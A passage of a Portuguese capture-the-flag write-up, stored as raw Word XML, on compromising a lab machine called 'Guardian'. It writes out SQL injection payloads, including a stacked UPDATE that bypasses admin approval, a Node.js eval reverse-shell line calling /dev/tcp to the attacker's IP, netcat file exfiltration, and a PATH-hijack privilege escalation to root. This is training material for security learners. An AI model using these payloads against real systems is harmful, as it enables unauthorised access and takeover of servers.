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Guardian</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>**Varredura nmap:**</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Como primeiro passo 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1012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b4615-38fa-45c3-9381-d57ad5c404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2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Observamos a presença da porta 80 hospedando um serviço web e a porta 22 correspondente ao ssh.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="230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95d803-8806-4358-9b09-0bf4eddf47a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acessarmos a aplicação web, identificamos uma página de login. Após tentativas de autenticação com credenciais padrão e exploração por meio de SQL Injection, não obtivemos êxito. No entanto, temos um ponto relevante: a aplicação permite o registro de novos usuários através da opção "Register for first access".</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="195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110994-9f57-408f-b6cc-a1cc81cb7d9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Aqui identificamos outro obstáculo: para efetuar o registro, é necessário fornecer o "EIN" de uma empresa já cadastrada na aplicação. Como não possuímos essa informação, podemos interceptar a requisição utilizando o Burp Suite para analisar detalhadamente os dados transmitidos, visando explorar potenciais vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="1642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6b371-ab37-4505-8e92-4bcbf792999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2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inserção da payload de SQL Injection `123456' or 1=1-- -`, a consulta SQL responsável por verificar o EIN fornecido foi manipulada. Como a condição `1=1` é sempre verdadeira, a aplicação retorna todos os registros de EIN presentes no banco de dados. Dessa forma, conseguimos obter uma lista completa de EINs cadastrados. A partir deste ponto, podemos selecionar um desses EINs para continuar o processo de registro na aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="1722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6f23f-9ee2-4548-bbe0-df94c49ecac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2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287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947a16-23f6-4724-9fd3-e83fa09416b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7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realizar o registro na aplicação utilizando o EIN obtido anteriormente, não foi possível efetuar o login com sucesso. Conforme a mensagem de retorno, o acesso depende de aprovação prévia por parte de um administrador.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="23850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980547-2e4f-442c-8fcc-2933024b2d7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5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analisar o cookie da aplicação, observamos que nenhum token foi definido inicialmente. No entanto, ao interceptarmos a requisição, verificamos que um token JWT é retornado na resposta.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="2441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871e9-b383-41b5-a03b-cb71fc372e3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7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108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bf910-74d5-4695-af22-0ee7b97b7f7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08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analisarmos a propriedade "approved" no payload do JWT, observamos que seu valor está definido como 0 (false). Com base nessa informação, podemos retornar à exploração do SQL Injection para verificar a existência da coluna "approved" no banco de dados, o que pode nos permitir manipular ou entender melhor o processo de aprovação de usuários na aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="2513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420dde-a532-43c6-90a6-828db149606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3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disso, podemos começar o nosso ataque.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Primeiro iremos identificar o número de colunas da tabela atual:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="13067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78a585-becc-4b4c-9874-d6382597157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7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ilustrado na imagem acima, há quatro colunas. O próximo passo é determinar o nome do banco de dados associado.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="12284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cb9e0e-c895-4858-879b-374ab2fce7a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84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nome do banco de dados (guardian) identificado, o próximo passo é recuperar os nomes das tabelas associadas a esse banco de dados.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="1463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ab67c5-bd3c-47fc-9b85-c5789fe408c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 tabela relevante para nossa análise no momento é a "users". Agora, vamos listar as colunas associadas a essa tabela.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="19374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b3336f-3e21-48b0-96fe-68ef28e8174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7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Observamos que a tabela `users` contém a coluna `approved`. Podemos aplicar uma técnica conhecida como "stacked queries" para atualizar o valor dessa coluna para 1. Com essa modificação, conseguiremos efetuar o login na aplicação sem depender da aprovação do administrador.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="14406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a81c7d-b661-490f-8fa0-2ac4ef19363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0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ourier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>"EIN":"123456'; UPDATE users set approved = '1' where username = 'usertest'-- -"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Com a payload acima, setamos a coluna `approved` para `1` onde o nome do usuário é `usertest`, no caso é o nome de usuário que utilizamos para se registrar na aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Feito isso, conseguimos logar na aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="11442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85e78d-2573-40ee-a1d1-ff52e973423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42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clicar no link "Customers" na barra de navegação, somos redirecionados para uma página que exibe a lista de `clientes` associados à empresa `BROKERAGE SOLUTIONS LTDA`.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="14560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e0f44f-aae1-44f5-a16d-6301defe02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6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analisar o comportamento da aplicação na página de listagem de clientes (Customers), observamos que ela realiza duas chamadas API distintas. Primeiro, a aplicação faz uma requisição para obter os dados da empresa. Em seguida, realiza uma segunda chamada para recuperar a lista de clientes associados a essa empresa.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="16138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17e2f-1a50-47e1-aa9b-cc980ed33e3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38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8693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13285c-f3ac-4bae-961f-b0e988afe8a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93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Embora não tenhamos acesso ao código fonte da aplicação, podemos inferir que essa chamada é potencialmente avaliada usando a função `eval`. O `eval` é uma função JavaScript que executa o código passado como string. Portanto, se o payload `"db.getClients('56-7890123')"` é passado para `eval`, ele seria executado como uma chamada para a função `db.getClients` com o parâmetro `'56-7890123'`.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>No entanto, ao tentarmos passar a expressão 1+1 como valor para o parâmetro action (o que resultaria em 11 quando passado entre aspas e avaliado pela função eval), recebemos um erro indicando que o valor de action é inválido. Isso sugere que a aplicação pode estar utilizando uma lista de permissões (whitelist) para validar os valores aceitos no parâmetro action.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="16819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ffb930-655b-4ea3-b099-32a6481b9c1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1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Entretanto, ao adicionar `+ 1+1` após a função `db.getClients('56-7890123')`, estamos efetivamente concatenando `1+1` ao resultado da função. Esse sinal de mais (`+`) faz com que o `eval` execute o código como uma expressão, resultando na inclusão de `11` no final da resposta. Isso ocorre porque a expressão `1+1` é avaliada e concatenada com a saída da função, mostrando que o código é parcialmente executado e que a função `eval` está processando parte da expressão fornecida.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="15491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343fec-d251-4067-aec8-e53f87718f6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9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Sabendo disso, podemos inserir uma payload de reverse shell, o que nos permitirá obter acesso remoto ao servidor alvo.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>stylus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>process.mainModule.require('childprocess').exec('/bin/bash -c \"sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1\"')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ouvinte do netcat para receber a conexão:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="112209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c3bc6f-213f-4177-9e7e-08cea16323e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2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60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c02d4-ebef-4670-b199-a2a1037da8f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0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enviarmos a requisição, recebemos a shell:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="11233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a6b07-b9ca-4538-9dbf-cdfac760fc0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3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Atualizando shell simples para TTYs totalmente interativos:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>script /dev/null -c bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ctrl+Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>stty raw -echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Acessando a home do usuário `guardian` conseguimos obter a primeira flag:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="11721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6166d1-a650-4f94-93e3-dfefc25d1aa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21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obtermos nossa primeira flag, precisamos elevar nossos privilégios para o usuário root. Ao empregarmos o comando "`find / -perm /4000 2&gt;/dev/null`" para listar binários com SUID, identificamos o binário "backup".</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="24615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11e02c-b080-4ec3-800f-cda469b4f6b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15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7227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4c722-3038-469c-a8d6-28843bc278d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27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tentarmos executar esse binário, é solicitada uma senha:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="130288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0087ce-73a6-4d06-93cf-a6fa32794dd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2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No entanto, como não temos a senha, podemos transferir o binário para nossa máquina e analisá-lo com a ferramenta de engenharia reversa Ghidra para uma investigação mais detalhada.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>#Na sua máquina local</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>nc -lvnp 4444 &gt; backup</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>#Na máquina alvo</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>nc &lt;ip-vpn&gt; 4444 &lt; backup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11811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85ad08-cb70-407d-ac34-adf5b8ba218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1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5932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37606-c8eb-4e41-b8b8-bc9ae0e2f0a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3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o binário em nossa máquina, podemos analisá-lo no Ghidra. Ao abrir o binário na ferramenta, podemos analisá-lo selecionando Functions &gt; main, o que nos permitirá examinar a lógica do binário.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="17789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67adb4-cccf-476b-9587-36dab38c364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9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analisar a lógica do binário, identificamos uma vulnerabilidade de Path Hijacking. O binário executa o comando `mysqldump` sem especificar o caminho completo, tornando-o vulnerável a ataques. No entanto, a execução do comando `mysqldump` através da função `system()` só ocorre se as credenciais fornecidas forem corretas. Portanto, para explorar essa vulnerabilidade, precisamos da senha, que pode ser obtida analisando a função `verifycredentials`.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="18804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c8b748-a2f1-4bb1-99c6-998b6eb2f0b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0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 senha em mãos, podemos iniciar a exploração. Primeiro, devemos navegar para um diretório onde tenhamos permissão de escrita, como `/tmp` ou a pasta home do usuário `guardian`. Em seguida, criaremos um binário falso chamado `mysqldump` nesse diretório. Este binário falso será configurado para executar um comando que, ao ser chamado, definirá o bit SUID no binário do `bash`, permitindo que o `bash` seja executado com privilégios elevados.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="124618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c8886f-3b13-43e2-a1cc-c36da6c3e5f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61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06773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ea6cd-f84a-44c3-ba39-56d5c18d441c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77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criar o binário falso `mysqldump`, exportamos o PATH para incluir o diretório atual onde o binário está localizado. Em seguida, executamos o binário `backup`, fornecendo a senha como argumento. Isso fará com que o comando `mysqldump` falso seja chamado. Depois disso, podemos executar `bash -p` para obter uma shell com privilégios elevados, permitindo-nos obter a última flag.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="11651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45f7be-fa4b-4015-8e29-ca9a14130f6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5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